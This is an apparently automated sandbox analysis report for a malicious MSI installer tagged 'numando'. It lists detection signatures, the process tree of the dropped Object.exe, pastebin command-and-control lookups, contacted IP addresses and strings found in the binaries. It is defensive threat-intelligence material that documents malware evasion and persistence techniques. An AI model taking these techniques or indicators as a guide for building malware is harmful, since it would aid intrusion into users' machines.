Loading ...

Play interactive tourEdit tour

Windows Analysis Report RT.msi

Overview

General Information

Sample Name:RT.msi
Analysis ID:539254
MD5:55b75999aeba3ccfd5309b39d7880baa
SHA1:293a2c7cd6ab5851563d868d549e9a2dfd00842c
SHA256:e07e5f0295deb4c8a77519cf41d915046d6962db92b7e667f68267d30e0b8399
Tags:msinumando
Infos:

Most interesting Screenshot:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Machine Learning detection for dropped file
Connects to a pastebin service (likely for C&C)
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Contains functionality to retrieve information about pressed keystrokes
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7132 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\RT.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 5940 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 6236 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DFDBA65093139CBFCFC106788AB0DE76 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • MSIBA90.tmp (PID: 6904 cmdline: C:\Windows\Installer\MSIBA90.tmp" /DontWait "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe MD5: A34D4F165087B11D9E06781D52262868)
  • Object.exe (PID: 3248 cmdline: "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe" MD5: 06B1B36CD7C59CF46CD7F5D661C4DA6F)
    • iexplore.exe (PID: 640 cmdline: C:\Program Files\Internet Explorer\iexplore.exe" %1 "https://bit.ly/3DvoVCc MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2228 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:640 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • Object.exe (PID: 6640 cmdline: "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe" MD5: 06B1B36CD7C59CF46CD7F5D661C4DA6F)
  • Object.exe (PID: 6468 cmdline: "C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe" MD5: 06B1B36CD7C59CF46CD7F5D661C4DA6F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Oleacc.dllJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 52.219.96.48:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.9.138:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.9.138:443 -> 192.168.2.3:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.94.65:443 -> 192.168.2.3:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.235:443 -> 192.168.2.3:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.94.65:443 -> 192.168.2.3:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.235:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 93.158.134.119:443 -> 192.168.2.3:49791 version: TLS 1.2
Source: unknownHTTPS traffic detected: 93.158.134.119:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49793 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.3:49796 version: TLS 1.2
Source: Binary string: D:\Build.Agent\TeamAgent\_work\1\s\Build\0\ScanMan\ScanMan\ScanWia\WinFinal\ScanWia.pdb source: Object.exe, 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000010.00000000.327506183.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000000.363719608.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.553587432.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000000.381050874.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.554030651.00000000004F0000.00000002.00020000.sdmp, Object.exe.10.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdba source: RT.msi, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdba source: RT.msi, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, 4c6e29.msi.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.dr
Source: Binary string: D:\Build.Agent\TeamAgent\_work\1\s\Build\0\ScanMan\ScanMan\ScanWia\WinFinal\ScanWia.pdb source: Object.exe, 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000010.00000000.327506183.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000000.363719608.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.553587432.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000000.381050874.00000000004F0000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.554030651.00000000004F0000.00000002.00020000.sdmp, Object.exe.10.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: RT.msi, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdb source: RT.msi, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, 4c6e29.msi.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb+ source: MSIBA90.tmp, 0000000E.00000000.325846490.0000000000FB8000.00000002.00020000.sdmp, MSIBA90.tmp, 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp, RT.msi, MSIBA90.tmp.4.dr, 4c6e29.msi.4.dr
Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\ssleay32.pdb source: Object.exe, 00000010.00000002.560666792.000000001203E000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560460264.000000001203E000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560575507.000000001203E000.00000002.00020000.sdmp, ssleay32.dll.10.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: RT.msi, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIBA90.tmp, 0000000E.00000000.325846490.0000000000FB8000.00000002.00020000.sdmp, MSIBA90.tmp, 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp, RT.msi, MSIBA90.tmp.4.dr, 4c6e29.msi.4.dr
Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\libeay32.pdbl source: Object.exe, 00000010.00000002.560518436.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560348876.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560440673.00000000110E6000.00000002.00020000.sdmp
Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\libeay32.pdb source: Object.exe, 00000010.00000002.560518436.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560348876.00000000110E6000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560440673.00000000110E6000.00000002.00020000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbV source: RT.msi, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0048A3B0 FindFirstFileW,GetLastError,InterlockedDecrement,16_2_0048A3B0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0048B820 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,16_2_0048B820
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_0048BB30 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,CreateFileW,CloseHandle,16_2_0048BB30
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_00478BF0 InterlockedDecrement,InterlockedIncrement,FindFirstFileW,InterlockedDecrement,InterlockedIncrement,FindClose,InterlockedIncrement,InterlockedDecrement,16_2_00478BF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0048A3B0 FindFirstFileW,GetLastError,InterlockedDecrement,20_2_0048A3B0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_00478BF0 InterlockedDecrement,InterlockedIncrement,FindFirstFileW,InterlockedDecrement,InterlockedIncrement,FindClose,InterlockedIncrement,InterlockedDecrement,20_2_00478BF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0048B820 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,20_2_0048B820
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_0048BB30 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,CreateFileW,CloseHandle,20_2_0048BB30
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0048A3B0 FindFirstFileW,GetLastError,InterlockedDecrement,22_2_0048A3B0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_00478BF0 InterlockedDecrement,InterlockedIncrement,FindFirstFileW,InterlockedDecrement,InterlockedIncrement,FindClose,InterlockedIncrement,InterlockedDecrement,22_2_00478BF0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0048B820 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,22_2_0048B820
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_0048BB30 SetErrorMode,SetErrorMode,SetErrorMode,FindFirstFileW,SetErrorMode,FindClose,CreateFileW,CloseHandle,22_2_0048BB30

Networking:

barindex
Connects to a pastebin service (likely for C&C)Show sources
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Dec 2021 23:57:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3SuOT9ODX5ZSPvbc0%2FNzOVLTxsMo7X4LZGI24lWaY3fJY0rztF7Z%2FmUjX7lq1HEQDM%2FJuFeyG2aH2wznpOf1U38F27oQCRPS%2FnHLk7muMOV8%2FBGhkhEZvNDs%2BSZsqByUYD4JC69rxg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6bd322a64c17432d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: Object.exe.10.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
Source: Object.exe.10.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0X
Source: Object.exe.10.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Object.exe.10.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0G
Source: Object.exe.10.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
Source: Object.exe.10.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://s.symcd.com06
Source: Object.exe.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
Source: Object.exe.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: iexplore.exe, 00000012.00000002.359164658.0000020557CF2000.00000004.00000001.sdmp, iexplore.exe, 00000012.00000002.359038323.0000020557CA5000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: iexplore.exe, 00000012.00000002.359164658.0000020557CF2000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico-
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://t2.symcb.com0
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://tl.symcd.com0&
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: f[4].txt.19.dr, f[2].txt.19.dr, f[3].txt.19.dr, f[1].txt.19.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: superfish.min[1].js.19.drString found in binary or memory: http://www.gnu.org/licenses/gpl.html
Source: Object.exe, Object.exe, 00000016.00000002.558849591.0000000002C87000.00000004.00000001.sdmp, Object.exe, 00000016.00000002.554807389.0000000000A01000.00000020.00020000.sdmpString found in binary or memory: http://www.indyproject.org/
Source: superfish.min[1].js.19.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: Object.exe, 00000010.00000002.560690383.0000000012052000.00000002.00020000.sdmp, Object.exe, 00000010.00000002.560595085.0000000011148000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560412625.0000000011148000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.560483056.0000000012052000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560525087.0000000011148000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.560610908.0000000012052000.00000002.00020000.sdmp, ssleay32.dll.10.drString found in binary or memory: http://www.openssl.org/V
